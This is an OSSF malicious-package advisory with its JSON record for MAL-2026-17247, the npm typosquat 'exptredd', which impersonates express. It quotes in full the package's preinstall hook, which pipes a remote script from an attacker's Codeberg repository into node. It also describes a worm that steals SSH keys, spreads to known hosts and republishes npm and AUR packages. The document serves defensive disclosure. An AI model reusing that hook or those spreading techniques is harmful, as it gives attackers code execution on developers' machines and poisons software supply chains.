mal-2026-17247
Vulnerability from ossf_malicious_packages
Published
2026-09-29 07:12
Modified
2026-10-01 08:00
Summary
Malicious code in exptredd (npm)
Details

The package exptredd impersonates the legitimate 'express' package (it republishes express's package metadata and code) and adds a malicious preinstall hook that runs automatically on npm install, before any dependency is installed: curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node. The hook downloads a remote JavaScript second stage from a Wayback Machine mirror of a Codeberg repository (hellscripter/install-scripts) and pipes it directly into node, giving the attacker arbitrary code execution on the installing machine. Version 5.2.1 was published on 2026-09-29. It is one of nine packages published within about 33 minutes by the npm account 'dirtyblanket' (maintainer email s7dwzxru4z@ooynib.com), all carrying the identical preinstall hook: xeprews, express-javascript, express-nodejs, react-nodejs, exprdd, exprrdd, exptrdd, exptred, exptredd.

On Linux, node.js pipes linux.sh from the same Codeberg repository into bash. linux.sh (SHA-256 65f0a95b24e30305146346cbc2452cfabadab9e1ca35053e1134b67c38919577) is a worm. It installs a Go binary, systemd-fontd, as a systemd service named "Font Rendering Service" that proxies through Tor. SafeDep has not yet analyzed that binary. The script collects SSH private keys and known_hosts files, then connects to the known hosts over SSH and runs linux.sh on them. With the same keys, it pushes a linux.sh loader into the .install file of Arch User Repository (AUR) packages that the key owner maintains. For each package.json on disk, it adds the same preinstall script, runs npm version patch, and runs npm publish with each .npmrc it finds.


-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (288357063a28e85e649fc37c747c724bd06ce09c16624f7b2cad3dc854296035)

npm package exptredd@5.2.1 impersonates the express package: package.json copies express's description, author, repository, contributors, and dependency list verbatim while shipping under the name 'exptredd'. package.json line 98 declares a preinstall lifecycle hook that runs curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node, fetching a JavaScript file from a third-party Codeberg repository on a mutable branch (via web.archive.org) with no version pin, hash, or signature, and piping it directly into node. Any developer who mistypes express and runs npm install exptredd executes arbitrary code from an account unrelated to the expressjs publisher at install time, with full permissions of the installing user.

CWE
  • CWE-506 - The product contains code that appears to be malicious in nature.

{
  "affected": [
    {
      "database_specific": {
        "cwes": [
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          }
        ],
        "indicators": {
          "evidence_files": [
            {
              "path": "package.json",
              "sha256": "092df5127a1acf706c0fd62b13b522d40cc65b2d5c05ca170aa885fcf99d9e2d",
              "tlsh": "f051da21cc0e8c6326c5a2dd3c69a542612188078e41f81cf769539c8f8e52f71b9fbf"
            }
          ],
          "package_integrity": [
            {
              "filename": "exptredd-5.2.1.tgz",
              "hashes": {
                "sha1": "91a068cf6ac31c9dad83f1d8eff99209cdb46d45",
                "sha512_sri": "sha512-u0YAjjAUpQ1AHLttM6SmGALvGUIoNNJLHLH+8eDSCgXlkQfCEohshSEJgNNaJJVHgxEwPx4KY9IQzEZk0dgwSw=="
              }
            }
          ]
        }
      },
      "package": {
        "ecosystem": "npm",
        "name": "exptredd"
      },
      "versions": [
        "5.2.1"
      ]
    }
  ],
  "credits": [
    {
      "contact": [
        "inspector-research@amazon.com"
      ],
      "name": "Amazon Inspector",
      "type": "FINDER"
    },
    {
      "name": "Pranesh, InvisiRisk",
      "type": "FINDER"
    },
    {
      "contact": [
        "https://safedep.io"
      ],
      "name": "SafeDep",
      "type": "FINDER"
    }
  ],
  "database_specific": {
    "iocs": {
      "files": [
        {
          "note": "preinstall script pipes the web.archive.org copy of node.js into node.",
          "paths": [
            "package.json"
          ],
          "source": "PACKAGE_ARCHIVE"
        },
        {
          "digests": {
            "sha256": "65f0a95b24e30305146346cbc2452cfabadab9e1ca35053e1134b67c38919577"
          },
          "note": "Stage two Bash worm, piped from curl into bash.",
          "paths": [
            "linux.sh"
          ],
          "source": "IN_MEMORY"
        },
        {
          "digests": {
            "sha256": "2c9dbc14809f1e1aebda114194368b002acf74c8760b88fc101f625d179793c2"
          },
          "note": "systemd-fontd, a stripped Go ELF x86-64 binary run as the \"Font Rendering Service\" systemd service. First path as root, second path without root.",
          "paths": [
            "/usr/lib/systemd/systemd-fontrenderd",
            "~/.config/systemd/systemd-fontcached"
          ],
          "source": "DROPPED"
        }
      ],
      "urls": [
        "https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js",
        "https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js",
        "https://codeberg.org/hellscripter/install-scripts/raw/branch/main/linux.sh",
        "https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/systemd-fontd"
      ]
    },
    "malicious-packages-origins": [
      {
        "id": "IN-MAL-2026-020627",
        "import_time": "2026-09-29T14:44:37.188150905Z",
        "modified_time": "2026-09-29T14:39:30Z",
        "sha256": "288357063a28e85e649fc37c747c724bd06ce09c16624f7b2cad3dc854296035",
        "source": "amazon-inspector",
        "versions": [
          "5.2.1"
        ]
      }
    ]
  },
  "details": "The package exptredd impersonates the legitimate \u0027express\u0027 package (it republishes express\u0027s package metadata and code) and adds a malicious preinstall hook that runs automatically on npm install, before any dependency is installed: `curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node`. The hook downloads a remote JavaScript second stage from a Wayback Machine mirror of a Codeberg repository (hellscripter/install-scripts) and pipes it directly into node, giving the attacker arbitrary code execution on the installing machine. Version 5.2.1 was published on 2026-09-29. It is one of nine packages published within about 33 minutes by the npm account \u0027dirtyblanket\u0027 (maintainer email s7dwzxru4z@ooynib.com), all carrying the identical preinstall hook: xeprews, express-javascript, express-nodejs, react-nodejs, exprdd, exprrdd, exptrdd, exptred, exptredd.\n\nOn Linux, node.js pipes linux.sh from the same Codeberg repository into bash. linux.sh (SHA-256 65f0a95b24e30305146346cbc2452cfabadab9e1ca35053e1134b67c38919577) is a worm. It installs a Go binary, systemd-fontd, as a systemd service named \"Font Rendering Service\" that proxies through Tor. SafeDep has not yet analyzed that binary. The script collects SSH private keys and known_hosts files, then connects to the known hosts over SSH and runs linux.sh on them. With the same keys, it pushes a linux.sh loader into the .install file of Arch User Repository (AUR) packages that the key owner maintains. For each package.json on disk, it adds the same preinstall script, runs npm version patch, and runs npm publish with each .npmrc it finds.\n\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (288357063a28e85e649fc37c747c724bd06ce09c16624f7b2cad3dc854296035)\nnpm package exptredd@5.2.1 impersonates the express package: package.json copies express\u0027s description, author, repository, contributors, and dependency list verbatim while shipping under the name \u0027exptredd\u0027. package.json line 98 declares a preinstall lifecycle hook that runs `curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node`, fetching a JavaScript file from a third-party Codeberg repository on a mutable branch (via web.archive.org) with no version pin, hash, or signature, and piping it directly into node. Any developer who mistypes `express` and runs `npm install exptredd` executes arbitrary code from an account unrelated to the expressjs publisher at install time, with full permissions of the installing user.\n",
  "id": "MAL-2026-17247",
  "modified": "2026-10-01T08:00:00Z",
  "published": "2026-09-29T07:12:49Z",
  "references": [
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/exptredd/v/5.2.1"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/exptredd"
    },
    {
      "type": "REPORT",
      "url": "https://safedep.io/dirtyblanket-express-impersonation-npm/"
    }
  ],
  "schema_version": "1.7.4",
  "summary": "Malicious code in exptredd (npm)"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Loading…

Loading…

Related by attack behaviour

Vulnerabilities whose description is nearest to this one in the vector space of the CIRCL/vulnerability-attack-technique-biencoder model. This is a similarity search over the bi-encoder space (plain cosine), not a classification, and it has no measured accuracy.


Loading…